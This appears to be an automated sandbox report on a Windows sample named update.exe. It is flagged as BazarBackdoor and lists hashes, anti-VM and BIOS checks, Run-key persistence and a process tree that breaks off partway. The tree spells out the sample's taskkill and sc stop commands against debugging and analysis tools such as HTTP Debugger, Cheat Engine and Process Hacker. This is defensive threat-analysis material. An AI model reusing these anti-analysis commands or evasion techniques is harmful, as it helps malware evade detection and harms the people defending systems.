Analysis
-
max time kernel
564s -
max time network
604s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
09-09-2022 14:03
Behavioral task
behavioral1
Sample
update.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
update.exe
Resource
win10v2004-20220812-en
General
-
Target
update.exe
-
Size
7.6MB
-
MD5
38d2e3ad694e5221b828441d82d6172d
-
SHA1
02e58b9fccb8fb01339c5f24aa26d656db389bcd
-
SHA256
3e8f5d33715f69f5297ca2750d9a9ed491749f009455217626b16f3b268dbcaf
-
SHA512
e96ca478921cb272f3b246e83b1b7a695638fb001dd05348ef4861b1842a2c49bccc4864867f99439e262fa983202056c196a2508597e2c83f4350683d5e6ea8
-
SSDEEP
196608:Bry4z4fbI39lVt1nRMT2cZlpbhQaQ9HQhMWuKej4ifJj/Fv4wkB1S:44z4MD1nS2YlUz9wTuD5/Fv4wcM
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\5112_419188955\us_tv_and_film.txt
Signatures
-
BazarBackdoor
Stealthy backdoor targeting corporate networks, believed to be developed by Trickbot's authors.
-
Bazar/Team9 Backdoor payload 21 IoCs
Processes:
resource yara_rule behavioral2/memory/2864-136-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3 behavioral2/memory/2864-137-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3 behavioral2/memory/2864-141-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3 behavioral2/memory/2864-142-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3 behavioral2/memory/2864-143-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3 behavioral2/memory/2864-207-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3 behavioral2/memory/2864-218-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3 behavioral2/memory/4336-287-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3 behavioral2/memory/4336-288-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3 behavioral2/memory/4336-291-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3 behavioral2/memory/4336-292-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3 behavioral2/memory/4336-293-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3 behavioral2/memory/4336-296-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3 behavioral2/memory/4336-304-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3 behavioral2/memory/1304-319-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3 behavioral2/memory/1304-320-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3 behavioral2/memory/1304-323-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3 behavioral2/memory/1304-324-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3 behavioral2/memory/1304-325-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3 behavioral2/memory/1304-328-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3 behavioral2/memory/1304-337-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp BazarBackdoorVar3 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
Processes:
update.exeK4F80D1AI28Y.exeJ0BK7JPSO0QL.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ update.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ K4F80D1AI28Y.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ J0BK7JPSO0QL.exe -
Nirsoft 21 IoCs
Processes:
resource yara_rule behavioral2/memory/2864-136-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft behavioral2/memory/2864-137-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft behavioral2/memory/2864-141-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft behavioral2/memory/2864-142-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft behavioral2/memory/2864-143-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft behavioral2/memory/2864-207-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft behavioral2/memory/2864-218-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft behavioral2/memory/4336-287-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft behavioral2/memory/4336-288-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft behavioral2/memory/4336-291-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft behavioral2/memory/4336-292-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft behavioral2/memory/4336-293-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft behavioral2/memory/4336-296-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft behavioral2/memory/4336-304-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft behavioral2/memory/1304-319-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft behavioral2/memory/1304-320-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft behavioral2/memory/1304-323-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft behavioral2/memory/1304-324-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft behavioral2/memory/1304-325-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft behavioral2/memory/1304-328-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft behavioral2/memory/1304-337-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp Nirsoft -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
pid process 3000 -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
update.exeK4F80D1AI28Y.exeJ0BK7JPSO0QL.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion update.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion update.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion K4F80D1AI28Y.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion K4F80D1AI28Y.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion J0BK7JPSO0QL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion J0BK7JPSO0QL.exe -
Loads dropped DLL 12 IoCs
Processes:
update.execertutil.exeK4F80D1AI28Y.exemsedge.execertutil.exeJ0BK7JPSO0QL.execertutil.exepid process 2864 update.exe 4232 896 certutil.exe 4336 K4F80D1AI28Y.exe 3000 5112 msedge.exe 3884 424 certutil.exe 1304 J0BK7JPSO0QL.exe 3000 5112 msedge.exe 4252 certutil.exe -
Processes:
resource yara_rule behavioral2/memory/2864-132-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida behavioral2/memory/2864-134-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida behavioral2/memory/2864-135-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida behavioral2/memory/2864-136-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida behavioral2/memory/2864-137-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida behavioral2/memory/2864-141-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida behavioral2/memory/2864-142-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida behavioral2/memory/2864-143-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida behavioral2/memory/2864-207-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida behavioral2/memory/2864-218-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida behavioral2/memory/4336-283-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida behavioral2/memory/4336-285-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida behavioral2/memory/4336-286-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida behavioral2/memory/4336-287-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida behavioral2/memory/4336-288-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida behavioral2/memory/4336-291-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida behavioral2/memory/4336-292-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida behavioral2/memory/4336-293-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida behavioral2/memory/4336-296-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida behavioral2/memory/4336-304-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida behavioral2/memory/1304-315-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida behavioral2/memory/1304-317-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida behavioral2/memory/1304-318-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida behavioral2/memory/1304-319-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida behavioral2/memory/1304-320-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida behavioral2/memory/1304-323-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida behavioral2/memory/1304-324-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida behavioral2/memory/1304-325-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida behavioral2/memory/1304-328-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida behavioral2/memory/1304-337-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp themida -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
msedge.exemsedge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe -
Processes:
update.exeK4F80D1AI28Y.exeJ0BK7JPSO0QL.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA update.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA K4F80D1AI28Y.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA J0BK7JPSO0QL.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
update.exeK4F80D1AI28Y.exeJ0BK7JPSO0QL.exepid process 2864 update.exe 4336 K4F80D1AI28Y.exe 1304 J0BK7JPSO0QL.exe -
Drops file in Program Files directory 2 IoCs
Processes:
setup.exedescription ioc process File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220909160450.pma setup.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\52d8498b-f826-45e0-936c-269e440ba83c.tmp setup.exe -
Launches sc.exe 27 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 3724 sc.exe 5020 sc.exe 1860 sc.exe 2368 sc.exe 3044 sc.exe 4796 sc.exe 2076 sc.exe 2380 sc.exe 5104 sc.exe 3252 sc.exe 5860 sc.exe 2364 sc.exe 2288 sc.exe 1072 sc.exe 5620 sc.exe 1796 sc.exe 4492 sc.exe 4560 sc.exe 2256 sc.exe 3664 sc.exe 4404 sc.exe 4364 sc.exe 3812 sc.exe 4992 sc.exe 5184 sc.exe 5212 sc.exe 3528 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
msedge.exemsedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Kills process with taskkill 64 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 5620 taskkill.exe 4460 taskkill.exe 1428 taskkill.exe 1812 taskkill.exe 3576 taskkill.exe 3408 taskkill.exe 4560 taskkill.exe 2444 taskkill.exe 4552 taskkill.exe 2508 taskkill.exe 1196 taskkill.exe 4812 taskkill.exe 4596 taskkill.exe 4224 taskkill.exe 3096 taskkill.exe 3968 taskkill.exe 3624 taskkill.exe 832 taskkill.exe 4992 taskkill.exe 5720 taskkill.exe 2316 taskkill.exe 560 taskkill.exe 5592 taskkill.exe 2716 taskkill.exe 4584 taskkill.exe 3012 taskkill.exe 2768 taskkill.exe 4604 taskkill.exe 5672 taskkill.exe 3112 taskkill.exe 3568 taskkill.exe 4076 taskkill.exe 1476 taskkill.exe 4380 taskkill.exe 2452 taskkill.exe 5676 taskkill.exe 2076 taskkill.exe 3080 taskkill.exe 1704 taskkill.exe 4612 taskkill.exe 5612 taskkill.exe 4440 taskkill.exe 3624 taskkill.exe 3568 taskkill.exe 5104 taskkill.exe 5032 taskkill.exe 2760 taskkill.exe 2760 taskkill.exe 2452 taskkill.exe 1456 taskkill.exe 3724 taskkill.exe 4460 taskkill.exe 3200 taskkill.exe 1524 taskkill.exe 3308 taskkill.exe 1120 taskkill.exe 3220 taskkill.exe 4196 taskkill.exe 3624 taskkill.exe 4928 taskkill.exe 2792 taskkill.exe 8 taskkill.exe 4456 taskkill.exe 752 taskkill.exe -
Modifies registry class 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe -
NTFS ADS 3 IoCs
Processes:
msedge.exemsedge.exedescription ioc process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 301679.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 224568.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 817197.crdownload:SmartScreen msedge.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
update.exepid process 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe 2864 update.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs
Processes:
msedge.exemsedge.exepid process 2104 msedge.exe 2104 msedge.exe 2104 msedge.exe 2104 msedge.exe 2104 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe -
Suspicious behavior: RenamesItself 3 IoCs
Processes:
update.exeK4F80D1AI28Y.exeJ0BK7JPSO0QL.exepid process 2864 update.exe 4336 K4F80D1AI28Y.exe 1304 J0BK7JPSO0QL.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 5032 taskkill.exe Token: SeDebugPrivilege 1872 taskkill.exe Token: SeDebugPrivilege 2104 taskkill.exe Token: SeDebugPrivilege 560 taskkill.exe Token: SeDebugPrivilege 852 taskkill.exe Token: SeDebugPrivilege 1276 taskkill.exe Token: SeDebugPrivilege 2508 taskkill.exe Token: SeDebugPrivilege 1244 taskkill.exe Token: SeDebugPrivilege 1820 taskkill.exe Token: SeDebugPrivilege 4388 taskkill.exe Token: SeDebugPrivilege 2760 taskkill.exe Token: SeDebugPrivilege 2768 taskkill.exe Token: SeDebugPrivilege 2040 taskkill.exe Token: SeDebugPrivilege 1120 taskkill.exe Token: SeDebugPrivilege 3568 taskkill.exe Token: SeDebugPrivilege 2452 taskkill.exe Token: SeDebugPrivilege 2392 taskkill.exe Token: SeDebugPrivilege 4460 taskkill.exe Token: SeDebugPrivilege 4812 taskkill.exe Token: SeDebugPrivilege 1428 taskkill.exe Token: SeDebugPrivilege 2076 taskkill.exe Token: SeDebugPrivilege 32 taskkill.exe Token: SeDebugPrivilege 4560 taskkill.exe Token: SeDebugPrivilege 1872 taskkill.exe Token: SeDebugPrivilege 2908 taskkill.exe Token: SeDebugPrivilege 3200 taskkill.exe Token: SeDebugPrivilege 4612 taskkill.exe Token: SeDebugPrivilege 3624 taskkill.exe Token: SeDebugPrivilege 4928 taskkill.exe Token: SeDebugPrivilege 2792 taskkill.exe Token: SeDebugPrivilege 2760 taskkill.exe Token: SeDebugPrivilege 800 taskkill.exe Token: SeDebugPrivilege 1812 taskkill.exe Token: SeDebugPrivilege 8 taskkill.exe Token: SeDebugPrivilege 3252 taskkill.exe Token: SeDebugPrivilege 1524 taskkill.exe Token: SeDebugPrivilege 2652 taskkill.exe Token: SeDebugPrivilege 4988 taskkill.exe Token: SeDebugPrivilege 3576 taskkill.exe Token: SeDebugPrivilege 3852 taskkill.exe Token: SeDebugPrivilege 2788 taskkill.exe Token: SeDebugPrivilege 2444 taskkill.exe Token: SeDebugPrivilege 3308 taskkill.exe Token: SeDebugPrivilege 4604 taskkill.exe Token: SeDebugPrivilege 4552 taskkill.exe Token: SeDebugPrivilege 3408 taskkill.exe Token: SeDebugPrivilege 1456 taskkill.exe Token: SeDebugPrivilege 4568 taskkill.exe Token: SeDebugPrivilege 4456 taskkill.exe Token: SeDebugPrivilege 5672 taskkill.exe Token: SeDebugPrivilege 1612 taskkill.exe Token: SeDebugPrivilege 3968 taskkill.exe Token: SeDebugPrivilege 5724 taskkill.exe Token: SeDebugPrivilege 5512 taskkill.exe Token: SeDebugPrivilege 3624 taskkill.exe Token: SeDebugPrivilege 5924 taskkill.exe Token: SeDebugPrivilege 344 taskkill.exe Token: SeDebugPrivilege 3112 taskkill.exe Token: SeDebugPrivilege 1684 taskkill.exe Token: SeDebugPrivilege 1436 taskkill.exe Token: SeDebugPrivilege 5720 taskkill.exe Token: SeDebugPrivilege 5612 taskkill.exe Token: SeDebugPrivilege 5604 taskkill.exe Token: SeDebugPrivilege 4660 taskkill.exe -
Suspicious use of FindShellTrayWindow 31 IoCs
Processes:
msedge.exemsedge.exepid process 2104 msedge.exe 2104 msedge.exe 2104 msedge.exe 2104 msedge.exe 2104 msedge.exe 2104 msedge.exe 2104 msedge.exe 2104 msedge.exe 2104 msedge.exe 2104 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
update.exeK4F80D1AI28Y.exeJ0BK7JPSO0QL.exepid process 2864 update.exe 4336 K4F80D1AI28Y.exe 4336 K4F80D1AI28Y.exe 1304 J0BK7JPSO0QL.exe 1304 J0BK7JPSO0QL.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
update.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2864 wrote to memory of 1860 2864 update.exe cmd.exe PID 2864 wrote to memory of 1860 2864 update.exe cmd.exe PID 1860 wrote to memory of 5032 1860 cmd.exe taskkill.exe PID 1860 wrote to memory of 5032 1860 cmd.exe taskkill.exe PID 2864 wrote to memory of 4288 2864 update.exe cmd.exe PID 2864 wrote to memory of 4288 2864 update.exe cmd.exe PID 4288 wrote to memory of 1872 4288 cmd.exe taskkill.exe PID 4288 wrote to memory of 1872 4288 cmd.exe taskkill.exe PID 2864 wrote to memory of 1116 2864 update.exe cmd.exe PID 2864 wrote to memory of 1116 2864 update.exe cmd.exe PID 1116 wrote to memory of 4364 1116 cmd.exe sc.exe PID 1116 wrote to memory of 4364 1116 cmd.exe sc.exe PID 2864 wrote to memory of 4868 2864 update.exe cmd.exe PID 2864 wrote to memory of 4868 2864 update.exe cmd.exe PID 4868 wrote to memory of 2104 4868 cmd.exe taskkill.exe PID 4868 wrote to memory of 2104 4868 cmd.exe taskkill.exe PID 2864 wrote to memory of 2440 2864 update.exe cmd.exe PID 2864 wrote to memory of 2440 2864 update.exe cmd.exe PID 2440 wrote to memory of 560 2440 cmd.exe taskkill.exe PID 2440 wrote to memory of 560 2440 cmd.exe taskkill.exe PID 2864 wrote to memory of 4540 2864 update.exe cmd.exe PID 2864 wrote to memory of 4540 2864 update.exe cmd.exe PID 4540 wrote to memory of 852 4540 cmd.exe taskkill.exe PID 4540 wrote to memory of 852 4540 cmd.exe taskkill.exe PID 2864 wrote to memory of 2328 2864 update.exe cmd.exe PID 2864 wrote to memory of 2328 2864 update.exe cmd.exe PID 2328 wrote to memory of 1276 2328 cmd.exe taskkill.exe PID 2328 wrote to memory of 1276 2328 cmd.exe taskkill.exe PID 2864 wrote to memory of 2344 2864 update.exe cmd.exe PID 2864 wrote to memory of 2344 2864 update.exe cmd.exe PID 2344 wrote to memory of 2508 2344 cmd.exe taskkill.exe PID 2344 wrote to memory of 2508 2344 cmd.exe taskkill.exe PID 2864 wrote to memory of 5104 2864 update.exe cmd.exe PID 2864 wrote to memory of 5104 2864 update.exe cmd.exe PID 5104 wrote to memory of 3664 5104 cmd.exe sc.exe PID 5104 wrote to memory of 3664 5104 cmd.exe sc.exe PID 2864 wrote to memory of 3460 2864 update.exe cmd.exe PID 2864 wrote to memory of 3460 2864 update.exe cmd.exe PID 3460 wrote to memory of 1244 3460 cmd.exe taskkill.exe PID 3460 wrote to memory of 1244 3460 cmd.exe taskkill.exe PID 2864 wrote to memory of 1992 2864 update.exe cmd.exe PID 2864 wrote to memory of 1992 2864 update.exe cmd.exe PID 1992 wrote to memory of 1820 1992 cmd.exe taskkill.exe PID 1992 wrote to memory of 1820 1992 cmd.exe taskkill.exe PID 2864 wrote to memory of 3164 2864 update.exe cmd.exe PID 2864 wrote to memory of 3164 2864 update.exe cmd.exe PID 3164 wrote to memory of 4388 3164 cmd.exe taskkill.exe PID 3164 wrote to memory of 4388 3164 cmd.exe taskkill.exe PID 2864 wrote to memory of 1948 2864 update.exe cmd.exe PID 2864 wrote to memory of 1948 2864 update.exe cmd.exe PID 1948 wrote to memory of 2760 1948 cmd.exe taskkill.exe PID 1948 wrote to memory of 2760 1948 cmd.exe taskkill.exe PID 2864 wrote to memory of 3760 2864 update.exe cmd.exe PID 2864 wrote to memory of 3760 2864 update.exe cmd.exe PID 3760 wrote to memory of 2768 3760 cmd.exe taskkill.exe PID 3760 wrote to memory of 2768 3760 cmd.exe taskkill.exe PID 2864 wrote to memory of 1676 2864 update.exe cmd.exe PID 2864 wrote to memory of 1676 2864 update.exe cmd.exe PID 1676 wrote to memory of 2288 1676 cmd.exe sc.exe PID 1676 wrote to memory of 2288 1676 cmd.exe sc.exe PID 2864 wrote to memory of 3808 2864 update.exe cmd.exe PID 2864 wrote to memory of 3808 2864 update.exe cmd.exe PID 3808 wrote to memory of 2040 3808 cmd.exe taskkill.exe PID 3808 wrote to memory of 2040 3808 cmd.exe taskkill.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\update.exe"C:\Users\Admin\AppData\Local\Temp\update.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: RenamesItself
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
